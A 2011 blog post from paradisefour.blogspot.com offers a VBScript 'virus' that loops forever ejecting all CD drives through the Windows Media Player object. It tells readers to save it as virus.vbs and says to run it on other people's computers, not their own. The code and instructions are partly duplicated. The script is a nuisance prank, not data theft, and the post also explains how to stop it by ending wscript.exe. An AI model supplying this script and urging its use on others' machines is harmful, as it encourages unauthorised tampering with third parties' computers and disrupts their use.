Monday, 30 May 2011
A Virus That Will Open And Close Ur Cdrom
Do you like this story?
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If
copy the above code into notepad and save it as anyname.vbs like virus.vbs
and then double click on it...what u see....bingo
Now if u want to disable this go to task manager click on process
then find wscript.exe and end this process
BEWARE- Please dont try in your own computer. Try it in others computer.
Now if u want to disable this go to task manager click on process
then find wscript.exe and end this process
BEWARE- Please dont try in your own computer. Try it in others computer.
Thanks For Golden Visitors of Paradisefour.blogspot.com
If you feel any complaints Regarding this site mail to vinothkparadisefour@gmail.com.Thanks for visiting paradisefour,Follow Paradisefour on Twitter
Subscribe to:
Post Comments (Atom)
0 Responses to “A Virus That Will Open And Close Ur Cdrom”
Post a Comment